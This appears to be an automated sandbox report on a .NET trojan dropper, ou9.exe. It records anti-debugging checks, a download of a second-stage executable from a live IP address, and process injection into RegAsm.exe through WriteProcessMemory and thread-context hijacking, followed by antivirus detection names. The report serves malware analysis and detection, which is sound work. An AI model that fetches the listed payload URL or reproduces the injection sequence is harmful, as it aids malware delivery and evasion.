Summary | ZeroBOX

ou9.exe

ScreenShot AntiDebug PE File PE32 .NET EXE AntiVM
Category Machine Started Completed
FILE s1_win7_x6403_us Sept. 22, 2024, 5:20 p.m. Sept. 22, 2024, 5:44 p.m.
Size 14.0KB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 e3107006030849c277e057b5a5fedc06
SHA256 50cd115622e40763687a9e1da3af3166656d1c6006d1625c6f62ead6ba37cea5
CRC32 8200C974
ssdeep 384:dyrwXkLG1bAAAAqtfWJ1kNRol5MqaYFiV2/6n:dhbFAAAAqtfWENiKAe
PDB Path C:\Users\Administrator\Desktop\RunPE-x\ConsoleApp66\obj\Release\Kpmg.pdb
Yara
  • PE_Header_Zero - PE File Signature
  • Is_DotNET_EXE - (no description)
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
147.45.44.131 Active Moloch

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
pdb_path C:\Users\Administrator\Desktop\RunPE-x\ConsoleApp66\obj\Release\Kpmg.pdb
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://147.45.44.131/files/ywp.exe
request GET http://147.45.44.131/files/ywp.exe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2052
region_size: 1638400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007e0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00930000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2052
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f31000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2052
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f32000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2052
region_size: 1638400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x020c0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02210000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00412000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00545000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0054b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00547000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0042c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00710000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0041c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0041a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00536000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0053a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00537000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0042a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0053b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00711000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2052
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00712000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
description Take ScreenShot rule ScreenShot
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
host 147.45.44.131
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2244
region_size: 323584
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000438
1 0 0
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

information_class: 8 (SystemProcessorPerformanceInformation)
1 0 0
description ou9.exe tried to sleep 5456326 seconds, actually delayed analysis time by 5456326 seconds
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL³ìÌfà fÆ0™@ð@…)¤x @BL¥¨.textœdf `.rdataU(€*j@@.data\í°X”@À.reloc@B Dì@B
base_address: 0x00400000
process_identifier: 2244
process_handle: 0x00000438
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2244
process_handle: 0x00000438
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL³ìÌfà fÆ0™@ð@…)¤x @BL¥¨.textœdf `.rdataU(€*j@@.data\í°X”@À.reloc@B Dì@B
base_address: 0x00400000
process_identifier: 2244
process_handle: 0x00000438
1 1 0
Process injection Process 2052 called NtSetContextThread to modify thread in remote process 2244
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4233520
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000434
process_identifier: 2244
1 0 0
Process injection Process 2052 resumed a thread in remote process 2244
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000434
suspend_count: 1
process_identifier: 2244
1 0 0
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 2052
1 0 0

NtResumeThread

thread_handle: 0x00000150
suspend_count: 1
process_identifier: 2052
1 0 0

NtResumeThread

thread_handle: 0x00000198
suspend_count: 1
process_identifier: 2052
1 0 0

NtResumeThread

thread_handle: 0x00000344
suspend_count: 1
process_identifier: 2052
1 0 0

NtResumeThread

thread_handle: 0x00000378
suspend_count: 1
process_identifier: 2052
1 0 0

NtResumeThread

thread_handle: 0x000003ac
suspend_count: 1
process_identifier: 2052
1 0 0

NtResumeThread

thread_handle: 0x000003c0
suspend_count: 1
process_identifier: 2052
1 0 0

NtResumeThread

thread_handle: 0x000003e8
suspend_count: 1
process_identifier: 2052
1 0 0

NtResumeThread

thread_handle: 0x000003fc
suspend_count: 1
process_identifier: 2052
1 0 0

NtResumeThread

thread_handle: 0x00000414
suspend_count: 1
process_identifier: 2052
1 0 0

NtResumeThread

thread_handle: 0x00000430
suspend_count: 1
process_identifier: 2052
1 0 0

CreateProcessInternalW

thread_identifier: 2248
thread_handle: 0x00000434
process_identifier: 2244
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
track: 1
command_line:
filepath_r: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000438
1 1 0

NtGetContextThread

thread_handle: 0x00000434
1 0 0

NtAllocateVirtualMemory

process_identifier: 2244
region_size: 323584
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000438
1 0 0

WriteProcessMemory

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL³ìÌfà fÆ0™@ð@…)¤x @BL¥¨.textœdf `.rdataU(€*j@@.data\í°X”@À.reloc@B Dì@B
base_address: 0x00400000
process_identifier: 2244
process_handle: 0x00000438
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00401000
process_identifier: 2244
process_handle: 0x00000438
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00438000
process_identifier: 2244
process_handle: 0x00000438
1 1 0

WriteProcessMemory

buffer:
base_address: 0x0043b000
process_identifier: 2244
process_handle: 0x00000438
1 1 0

WriteProcessMemory

buffer:
base_address: 0x0044a000
process_identifier: 2244
process_handle: 0x00000438
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2244
process_handle: 0x00000438
1 1 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4233520
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000434
process_identifier: 2244
1 0 0

NtResumeThread

thread_handle: 0x00000434
suspend_count: 1
process_identifier: 2244
1 0 0
Bkav W32.AIDetectMalware.CS
Lionic Trojan.Win32.Generic.m289
CTX exe.trojan.msil
CAT-QuickHeal Trojan.Generic
Skyhigh Artemis!Trojan
Cylance Unsafe
VIPRE Gen:Heur.MSIL.Krypt.6
Sangfor Trojan.Win32.Injector.Vhkg
CrowdStrike win/malicious_confidence_90% (D)
Alibaba Trojan:MSIL/Injector.b2af7a52
K7GW Trojan ( 0050bedf1 )
K7AntiVirus Trojan ( 0050bedf1 )
Arcabit Trojan.MSIL.Krypt.6
VirIT Trojan.Win32.MSIL.HGP
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of MSIL/Injector.LOS
APEX Malicious
Paloalto generic.ml
ClamAV Win.Packed.Pwsx-10035668-0
Kaspersky HEUR:Trojan.Win32.Generic
BitDefender Gen:Heur.MSIL.Krypt.6
MicroWorld-eScan Gen:Heur.MSIL.Krypt.6
Rising Trojan.Injector!8.C4 (CLOUD)
Emsisoft Gen:Heur.MSIL.Krypt.6 (B)
F-Secure Trojan.TR/Injector.klqnr
DrWeb Trojan.InjectNET.17
Zillya Trojan.Injector.Win32.1864498
TrendMicro TrojanSpy.Win32.LUMMASTEALER.YXEIDZ
McAfeeD Real Protect-LS!E31070060308
Sophos Mal/Generic-S
Ikarus Trojan.MSIL.Injector
FireEye Generic.mg.e3107006030849c2
Jiangmin Trojan.MSIL.apeix
Google Detected
Avira TR/Injector.klqnr
Antiy-AVL Trojan/Win32.Agent
Kingsoft MSIL.Trojan.Agent.gen
Microsoft Trojan:Win32/Multiverze
ZoneAlarm HEUR:Trojan.Win32.Generic
GData Gen:Heur.MSIL.Krypt.6
Varist W32/MSIL_Troj.C.gen!Eldorado
AhnLab-V3 Trojan/Win.Generic.C5663268
McAfee Artemis!E31070060308
DeepInstinct MALICIOUS
VBA32 Trojan.MSIL.DiscoStealer.Heur
Malwarebytes Trojan.Injector.MSIL
TrendMicro-HouseCall TrojanSpy.Win32.LUMMASTEALER.YXEIDZ
Tencent Malware.Win32.Gencirc.1418d6ba
huorong Trojan/MSIL.Injector.fx